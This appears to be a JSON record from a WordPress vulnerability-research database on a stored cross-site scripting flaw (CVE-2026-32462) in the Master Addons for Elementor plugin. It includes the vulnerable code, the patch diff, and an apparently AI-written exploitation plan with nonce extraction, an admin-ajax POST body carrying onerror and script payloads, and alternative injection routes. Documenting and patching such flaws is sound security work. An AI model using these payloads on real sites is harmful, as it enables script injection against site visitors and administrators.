[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fI558gmEuLCDA-Mf9pgVzv_dVT3lxjW3COpEBqVgUf_Y":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32462","master-addons-for-elementor-widgets-extensions-theme-builder-popup-builder-template-kits-authenticated-author-stored-cro","Master Addons For Elementor – Widgets, Extensions, Theme Builder, Popup Builder & Template Kits \u003C= 2.1.3 - Authenticated (Author+) Stored Cross-Site Scripting","The Master Addons For Elementor – Widgets, Extensions, Theme Builder, Popup Builder & Template Kits plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","master-addons",null,"\u003C=2.1.3","2.1.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-16 00:00:00","2026-03-19 15:08:16",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7a8c28d9-f290-4b08-b48c-beb560c63d2f?source=api-prod",4,[22,23,24,25,26,27,28,29],"addons\u002Fma-advanced-image\u002Fma-advanced-image.php","addons\u002Fma-business-hours\u002Fma-business-hours.php","addons\u002Fma-cards\u002Fma-cards.php","addons\u002Fma-creative-links\u002Fma-creative-links.php","addons\u002Fma-flipbox\u002Fma-flipbox.php","addons\u002Fma-image-filter-gallery\u002Fma-image-filter-gallery.php","addons\u002Fma-infobox\u002Fma-infobox.php","addons\u002Fma-search\u002Fma-search.php","researched",false,3,"This plan outlines the research and exploitation steps to verify the Stored Cross-Site Scripting (XSS) vulnerability in the Master Addons For Elementor plugin.\n\n### 1. Vulnerability Summary\nThe \"Master Addons For Elementor\" plugin fails to properly sanitize and escape input in various Elementor widget controls. When a user with Author-level permissions or higher creates or edits a page using the Elementor builder and adds one of the affected widgets (e.g., **Cards**, **Advanced Image**, **Business Hours**), they can inject malicious scripts into text fields. These scripts are then stored in the post's metadata and executed in the context of any user (including Administrators) who views the page.\n\n### 2. Attack Vector Analysis\n- **Vulnerable Endpoints**: `wp-admin\u002Fadmin-ajax.php` (via Elementor's `save_builder` action).\n- **Vulnerable Parameter**: The `elements` array within the `actions` parameter of the `elementor_ajax` call.\n- **Authentication Level**: Author or above (any user with `edit_posts` capability for a post they own).\n- **Preconditions**: Elementor must be active, and the attacker must be able to edit a page\u002Fpost using the Elementor editor.\n\n### 3. Code Flow\n1. **Input**: An Author sends a JSON payload to the `elementor_ajax` action containing widget settings (e.g., `ma_el_card_title` for the `ma-el-card` widget).\n2. **Storage**: Elementor's backend processing saves this JSON into the `_elementor_data` post meta for that specific post.\n3. **Execution**:\n    - When the page is rendered, `Elementor\\Widget_Base::get_settings_for_display()` (inherited by the widgets) retrieves the saved settings.\n    - The widget's `render()` function (e.g., in `addons\u002Fma-cards\u002Fma-cards.php`) accesses these settings: `$settings = $this->get_settings_for_display();`.\n    - The code then echoes the value directly without escaping: `echo $settings['ma_el_card_title'];` (or similar unescaped output calls).\n4. **Sink**: The raw HTML\u002FJavaScript is sent to the browser and executed.\n\n### 4. Nonce Acquisition Strategy\nTo save Elementor data via HTTP, the `elementor_ajax` nonce is required. \n1.  **Preparation**: Create a page and assign it to the Author.\n2.  **Navigation**: Open the Elementor editor for that page in the browser: `browser_navigate(\"\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor\")`.\n3.  **Extraction**: The nonce is stored in a global JavaScript configuration object. Use `browser_eval` to extract it:\n    - **Variable 1**: `window.elementorConfig?.ajax?.nonce`\n    - **Variable 2**: `window.elementorCommon?.config?.ajax?.nonce`\n    - **Variable 3**: `window.elementorEditorConfig?.ajax?.nonce`\n\n### 5. Exploitation Strategy\nWe will target the **Cards** widget (`ma-el-card`) and its `ma_el_card_title` control.\n\n**Step 1: Authenticated Session**\nLogin as a user with the **Author** role.\n\n**Step 2: Nonce Extraction**\nNavigate to the Elementor editor of a post owned by the Author and extract the `elementor_ajax` nonce using the strategy above.\n\n**Step 3: Inject Payload**\nSend an HTTP POST request to `admin-ajax.php` to save the malicious widget configuration.\n\n- **URL**: `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: POST\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body Parameters**:\n    - `action`: `elementor_ajax`\n    - `_nonce`: `[EXTRACTED_NONCE]`\n    - `actions`: (URL-encoded JSON string below)\n```json\n{\n  \"save_builder\": {\n    \"action\": \"save_builder\",\n    \"data\": {\n      \"status\": \"publish\",\n      \"elements\": [\n        {\n          \"id\": \"jltma_sec\",\n          \"elType\": \"section\",\n          \"elements\": [\n            {\n              \"id\": \"jltma_col\",\n              \"elType\": \"column\",\n              \"elements\": [\n                {\n                  \"id\": \"jltma_card_exploit\",\n                  \"elType\": \"widget\",\n                  \"widgetType\": \"ma-el-card\",\n                  \"settings\": {\n                    \"ma_el_card_title\": \"\u003Cimg src=x onerror=alert('XSS_SUCCESS_TITLE')>\",\n                    \"ma_el_card_tag\": \"\u003Cimg src=x onerror=alert('XSS_SUCCESS_TAG')>\",\n                    \"ma_el_card_description\": \"\u003Cimg src=x onerror=alert('XSS_SUCCESS_DESC')>\"\n                  }\n                }\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  }\n}\n```\n\n**Step 4: Execution**\nVisit the frontend of the page (`\u002F?p=[POST_ID]`).\n\n### 6. Test Data Setup\n1.  **Create Author User**:\n    `wp user create author_tester author@example.com --role=author --user_pass=password123`\n2.  **Create Page**:\n    `wp post create --post_type=page --post_title=\"Elementor XSS Test\" --post_status=publish --post_author=$(wp user get author_tester --field=ID)`\n3.  **Ensure Elementor Role Manager Permissions**: By default, Authors can use Elementor. Ensure no restrictions are set in **Elementor > Role Manager**.\n\n### 7. Expected Results\n- The `elementor_ajax` request should return a `200 OK` with a JSON body indicating `{\"success\":true,...}`.\n- When viewing the page, a JavaScript alert box should appear with the message `XSS_SUCCESS_TITLE`.\n- Inspecting the source of the rendered page should show the raw `\u003Cimg src=x onerror=...>` inside the `ma-el-card-title` div.\n\n### 8. Verification Steps\n- **CLI Verification**: Check if the payload is stored in post meta.\n  `wp post meta get [POST_ID] _elementor_data`\n  (Confirm the JSON contains the `onerror` payload).\n- **DOM Verification**: Use `browser_eval` to check for the presence of the exploit string.\n  `browser_eval(\"document.body.innerHTML.includes('XSS_SUCCESS_TITLE')\")`\n\n### 9. Alternative Approaches\nIf the `ma-el-card` widget is patched or unavailable, use these alternatives:\n- **Advanced Image Widget**:\n    - `widgetType`: `jltma-advanced-image`\n    - `settings`: `{\"ma_el_adv_image_display_ribbon\": \"yes\", \"ma_el_adv_image_ribbon_text\": \"\u003Cscript>alert(1)\u003C\u002Fscript>\"}`\n- **Search Widget**:\n    - `widgetType`: `ma-search`\n    - `settings`: `{\"jltma_search_icon_popup_search_text\": \"\u003Cscript>alert(1)\u003C\u002Fscript>\"}`\n- **Direct Meta Update (Bypass AJAX)**:\n    If the AJAX nonce extraction fails, manually set the meta as a test to verify the rendering vulnerability:\n    `wp post meta set [POST_ID] _elementor_data '[JSON_PAYLOAD_HERE]'`\n    `wp post meta set [POST_ID] _elementor_edit_mode active`","The Master Addons For Elementor plugin is vulnerable to authenticated Stored Cross-Site Scripting (XSS) via several widgets (e.g., Cards, Business Hours, Search) due to insufficient output escaping on user-controlled settings. Attackers with Author-level permissions or higher can inject arbitrary JavaScript into widget fields, which is then executed in the context of any user viewing the affected page.","\u002F\u002F addons\u002Fma-business-hours\u002Fma-business-hours.php line 1489\nif ($item['ma_el_bh_closed_text']) {\n\techo '\u003Cspan class=\"closed\">' . $this->parse_text_editor($item['ma_el_bh_closed_text']) . '\u003C\u002Fspan>';\n}\n\n---\n\n\u002F\u002F addons\u002Fma-creative-links\u002Fma-creative-links.php line 758\nif ($effect === 'jltma-cl-effect-9') {\n\t$alt_text = !empty($settings['creative_alternative_link_text']) ? $settings['creative_alternative_link_text'] : $settings['creative_link_text'];\n\techo '\u003Cspan>' . $this->parse_text_editor($alt_text) . '\u003C\u002Fspan>';\n}\n\n---\n\n\u002F\u002F addons\u002Fma-search\u002Fma-search.php line 820\nif ($jltma_search_submit_button) {\n\techo '\u003Cspan>' . $this->parse_text_editor($jltma_search_submit_button) . '\u003C\u002Fspan>';\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-advanced-image\u002Fma-advanced-image.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-advanced-image\u002Fma-advanced-image.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-advanced-image\u002Fma-advanced-image.php\t2026-01-11 12:16:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-advanced-image\u002Fma-advanced-image.php\t2026-02-28 11:52:04.000000000 +0000\n@@ -1719,7 +1719,7 @@\n \t\t\tif (!empty($image_primary_meta['height'])) {\n \t\t\t\t$lightbox_attrs .= 'data-original-height=\"' . esc_attr($image_primary_meta['height']) . '\" ';\n \t\t\t}\n-\t\t\t$lightbox_attrs     .= 'data-description=\"' . $this->ma_el_attachment_caption($attach_id) . '\"';\n+\t\t\t$lightbox_attrs     .= 'data-description=\"' . esc_attr($this->ma_el_attachment_caption($attach_id)) . '\"';\n \t\t} elseif (!empty($image_html)) {\n \t\t\t$image_primary = $image_html;\n \t\t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-business-hours\u002Fma-business-hours.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-business-hours\u002Fma-business-hours.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-business-hours\u002Fma-business-hours.php\t2026-02-15 10:04:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-business-hours\u002Fma-business-hours.php\t2026-02-28 11:52:04.000000000 +0000\n@@ -1486,7 +1486,7 @@\n \t\t\t\t\t\t\t\u003C?php\n \t\t\t\t\t\t\t} else {\n \t\t\t\t\t\t\t\tif ($item['ma_el_bh_closed_text']) {\n-\t\t\t\t\t\t\t\t\techo '\u003Cspan class=\"closed\">' . $this->parse_text_editor($item['ma_el_bh_closed_text']) . '\u003C\u002Fspan>';\n+\t\t\t\t\t\t\t\t\techo '\u003Cspan class=\"closed\">' . esc_html($this->parse_text_editor($item['ma_el_bh_closed_text'])) . '\u003C\u002Fspan>';\n \t\t\t\t\t\t\t\t} else {\n \t\t\t\t\t\t\t\t\techo '\u003Cspan class=\"closed\">' . esc_html('Closed', 'master-addons' ) . '\u003C\u002Fspan>';\n \t\t\t\t\t\t\t\t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-creative-links\u002Fma-creative-links.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-creative-links\u002Fma-creative-links.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-creative-links\u002Fma-creative-links.php\t2026-02-15 10:04:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-creative-links\u002Fma-creative-links.php\t2026-02-28 11:52:04.000000000 +0000\n@@ -755,7 +755,7 @@\n \t\t\t\t\t\u002F\u002F Alternative text for effect 9\n \t\t\t\t\tif ($effect === 'jltma-cl-effect-9') {\n \t\t\t\t\t\t$alt_text = !empty($settings['creative_alternative_link_text']) ? $settings['creative_alternative_link_text'] : $settings['creative_link_text'];\n-\t\t\t\t\t\techo '\u003Cspan>' . $this->parse_text_editor($alt_text) . '\u003C\u002Fspan>';\n+\t\t\t\t\t\techo '\u003Cspan>' . esc_html($this->parse_text_editor($alt_text)) . '\u003C\u002Fspan>';\n \t\t\t\t\t}\n \n \t\t\t\t\t\u002F\u002F Icon After Text\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-search\u002Fma-search.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-search\u002Fma-search.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.3\u002Faddons\u002Fma-search\u002Fma-search.php\t2024-10-02 12:20:38.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmaster-addons\u002F2.1.4\u002Faddons\u002Fma-search\u002Fma-search.php\t2026-02-28 11:52:04.000000000 +0000\n@@ -817,7 +817,7 @@\n \n                                 \u003C?php\n                                 if ($jltma_search_submit_button) {\n-                                    echo '\u003Cspan>' . $this->parse_text_editor($jltma_search_submit_button) . '\u003C\u002Fspan>';\n+                                    echo '\u003Cspan>' . esc_html($this->parse_text_editor($jltma_search_submit_button)) . '\u003C\u002Fspan>';\n                                 } ?>\n                             \u003C\u002Fbutton>\n                         \u003C\u002Fdiv>","To exploit this vulnerability, an attacker with Author-level access needs to:\n1. Log in to the WordPress dashboard and access the Elementor editor for a post or page they are authorized to edit.\n2. Extract the `elementor_ajax` nonce from the page source or global JavaScript environment (e.g., `window.elementorConfig.ajax.nonce`).\n3. Use a tool like Burp Suite or `curl` to send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `elementor_ajax` and the sub-action `save_builder`.\n4. Within the `actions` parameter of the AJAX request, provide a JSON payload representing a layout with a vulnerable Master Addons widget (such as `ma-el-card` or `ma-search`).\n5. Inject a malicious JavaScript payload (e.g., `\u003Cimg src=x onerror=alert(domain)>`) into one of the widget's text settings (e.g., `ma_el_card_title` or `jltma_search_submit_button`).\n6. Once saved, any user who visits the published page will have the script executed in their browser session.","gemini-3-flash-preview","2026-04-18 03:26:10","2026-04-18 03:26:56",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.1.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmaster-addons\u002Ftags\u002F2.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmaster-addons.2.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmaster-addons\u002Ftags\u002F2.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmaster-addons.2.1.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmaster-addons\u002Ftags"]